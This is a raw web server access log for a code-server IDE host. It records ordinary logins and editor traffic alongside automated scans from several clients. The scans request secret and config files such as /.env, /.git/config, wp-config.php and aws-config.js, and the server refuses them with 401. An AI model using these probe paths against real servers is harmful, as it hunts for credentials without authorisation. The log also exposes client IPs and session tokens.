Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/src/config.js" [Client 216.81.248.16] [Length 654] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/src/constants.js" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/lib/config.js" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/window.env.js" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/settings.json" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/env.json" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/payment" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/subscribe" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/.vite/manifest.json" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 216.81.248.16] [Length 296] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/sw.js" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/api/settings" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/api/v1/config" [Client 216.81.248.16] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/webpack-runtime.js" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/static/js/4.chunk.js" [Client 216.81.248.16] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/static/js/5.chunk.js" [Client 216.81.248.16] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/_next/static/chunks/2.js" [Client 216.81.248.16] [Length 657] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/_next/static/chunks/1.js" [Client 216.81.248.16] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/@vite/env" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/src/env.d.ts" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:26 +0000] - 401 401 - GET https code.profibot.hu "/vite.config.js" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:27 +0000] - 401 401 - GET https code.profibot.hu "/_app/immutable/entry/start.js" [Client 216.81.248.16] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:27 +0000] - 401 401 - GET https code.profibot.hu "/vite.config.ts" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:27 +0000] - 401 401 - GET https code.profibot.hu "/svelte.config.js" [Client 216.81.248.16] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:27 +0000] - 401 401 - GET https code.profibot.hu "/_app/immutable/chunks/index.js" [Client 216.81.248.16] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:27 +0000] - 401 401 - GET https code.profibot.hu "/_app/immutable/chunks/singletons.js" [Client 216.81.248.16] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:27 +0000] - 401 401 - GET https code.profibot.hu "/build/index.js" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:27 +0000] - 401 401 - GET https code.profibot.hu "/app/root.tsx" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:27 +0000] - 401 401 - GET https code.profibot.hu "/public/build/entry.client.js" [Client 216.81.248.16] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:27 +0000] - 401 401 - GET https code.profibot.hu "/app/entry.client.tsx" [Client 216.81.248.16] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:02:44:27 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 216.81.248.16] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "https://code.profibot.hu/" +[20/Jan/2026:03:39:15 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 84.254.106.197] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:03:39:15 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 84.254.106.197] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/" +[20/Jan/2026:03:39:15 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/favicon-dark-support.svg" [Client 84.254.106.197] [Length 685] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:03:39:15 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 84.254.106.197] [Length 296] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:03:39:15 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-512.png" [Client 84.254.106.197] [Length 8489] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:03:39:15 +0000] - 401 401 - GET https code.profibot.hu "/js/twint_ch.js" [Client 84.254.106.197] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:03:39:15 +0000] - 401 401 - GET https code.profibot.hu "/js/lkk_ch.js" [Client 84.254.106.197] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:03:39:15 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/pages/login.css" [Client 84.254.106.197] [Length 464] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:03:39:15 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 84.254.106.197] [Length 4226] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:03:39:15 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 84.254.106.197] [Length 3276] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:03:39:15 +0000] - 401 401 - GET https code.profibot.hu "/css/support_parent.css" [Client 84.254.106.197] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:03:39:15 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/pages/global.css" [Client 84.254.106.197] [Length 804] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:04:39:32 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 23.27.145.159] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[20/Jan/2026:04:39:32 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 23.27.145.159] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[20/Jan/2026:04:46:03 +0000] - 302 302 - GET http code.profibot.hu "/" [Client 35.198.208.64] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" +[20/Jan/2026:04:46:04 +0000] - 200 200 - GET http code.profibot.hu "/login" [Client 35.198.208.64] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" +[20/Jan/2026:04:46:05 +0000] - 401 401 - GET http code.profibot.hu "/wordpress/" [Client 35.198.208.64] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0 Safari/537.36" "-" +[20/Jan/2026:05:10:18 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=7f4f9863-edfb-451d-b2f7-7ee04b62a1d8&reconnection=true&skipWebSocketFrames=false" [Client 37.76.15.169] [Length 172] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:05:10:19 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=bc07b6d0-5db2-4ff7-8e43-28100908b986&reconnection=true&skipWebSocketFrames=false" [Client 37.76.15.169] [Length 172] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:05:59:05 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 195.178.110.132] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[20/Jan/2026:05:59:05 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 195.178.110.132] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://code.profibot.hu" +[20/Jan/2026:05:59:05 +0000] - 401 401 - GET https code.profibot.hu "/.env" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" +[20/Jan/2026:05:59:06 +0000] - 401 401 - GET https code.profibot.hu "/.env" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[20/Jan/2026:05:59:06 +0000] - 401 401 - GET https code.profibot.hu "/.env.bak" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" +[20/Jan/2026:05:59:06 +0000] - 401 401 - GET https code.profibot.hu "/.env.save" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[20/Jan/2026:05:59:06 +0000] - 401 401 - GET https code.profibot.hu "/backend/.env" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[20/Jan/2026:05:59:06 +0000] - 401 401 - GET https code.profibot.hu "/admin/.env" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[20/Jan/2026:05:59:06 +0000] - 401 401 - GET https code.profibot.hu "/.git/config" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[20/Jan/2026:05:59:06 +0000] - 401 401 - GET https code.profibot.hu "/wp-config.php" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" +[20/Jan/2026:05:59:06 +0000] - 401 401 - GET https code.profibot.hu "/wp-config.php.old" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[20/Jan/2026:05:59:06 +0000] - 401 401 - GET https code.profibot.hu "/config.php" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[20/Jan/2026:05:59:06 +0000] - 401 401 - GET https code.profibot.hu "/config.php.bak" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[20/Jan/2026:05:59:06 +0000] - 401 401 - GET https code.profibot.hu "/config.js" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[20/Jan/2026:05:59:06 +0000] - 401 401 - GET https code.profibot.hu "/aws-config.js" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[20/Jan/2026:05:59:06 +0000] - 401 401 - GET https code.profibot.hu "/aws.config.js" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[20/Jan/2026:05:59:06 +0000] - 401 401 - GET https code.profibot.hu "/.git/HEAD" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[20/Jan/2026:05:59:06 +0000] - 401 401 - GET https code.profibot.hu "/.git/config" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" +[20/Jan/2026:06:44:07 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 84.1.26.27] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://gemini.google.com/" +[20/Jan/2026:06:44:07 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 84.1.26.27] [Length 934] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://gemini.google.com/" +[20/Jan/2026:06:44:07 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/pages/login.css" [Client 84.1.26.27] [Length 427] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[20/Jan/2026:06:44:07 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/pages/global.css" [Client 84.1.26.27] [Length 769] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[20/Jan/2026:06:44:07 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 84.1.26.27] [Length 291] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[20/Jan/2026:06:44:07 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 84.1.26.27] [Length 4213] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[20/Jan/2026:06:44:07 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 84.1.26.27] [Length 3276] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[20/Jan/2026:06:44:07 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/favicon-dark-support.svg" [Client 84.1.26.27] [Length 685] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[20/Jan/2026:06:44:21 +0000] - 302 302 - POST https code.profibot.hu "/login" [Client 84.1.26.27] [Length 31] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[20/Jan/2026:06:44:21 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 84.1.26.27] [Length 58] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[20/Jan/2026:06:44:21 +0000] - 200 200 - GET https code.profibot.hu "/?folder=/home/coder/project" [Client 84.1.26.27] [Length 1380] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[20/Jan/2026:06:44:21 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/code/browser/workbench/workbench.css" [Client 84.1.26.27] [Length 112539] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:06:44:21 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/nls.messages.js" [Client 84.1.26.27] [Length 188008] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:06:44:21 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/code/browser/workbench/workbench.js" [Client 84.1.26.27] [Length 3503582] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:06:44:23 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:06:44:23 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 84.1.26.27] [Length 291] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:06:44:23 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:06:44:23 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vsda/rust/web/vsda_bg.wasm" [Client 84.1.26.27] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:06:44:23 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vsda/rust/web/vsda.js" [Client 84.1.26.27] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:06:44:23 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/services/keybinding/browser/keyboardLayouts/layout.contribution.win.js" [Client 84.1.26.27] [Length 9212] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/code/browser/workbench/workbench.js" +[20/Jan/2026:06:44:23 +0000] - 200 200 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 84.1.26.27] [Length 402] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:06:44:24 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/media/code-icon.svg" [Client 84.1.26.27] [Length 261] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/code/browser/workbench/workbench.css" +[20/Jan/2026:06:44:24 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/media/letterpress-light.svg" [Client 84.1.26.27] [Length 299] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/code/browser/workbench/workbench.css" +[20/Jan/2026:06:44:24 +0000] - 200 200 - GET https code.profibot.hu "/update/check" [Client 84.1.26.27] [Length 80] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[20/Jan/2026:06:44:24 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/services/extensions/worker/webWorkerExtensionHostIframe.html?&vscodeWebWorkerExtHostId=34017445-acef-4936-9950-ab985999452b" [Client 84.1.26.27] [Length 2196] [Gzip -] [Sent-to code-server] "Mozilla/5.0 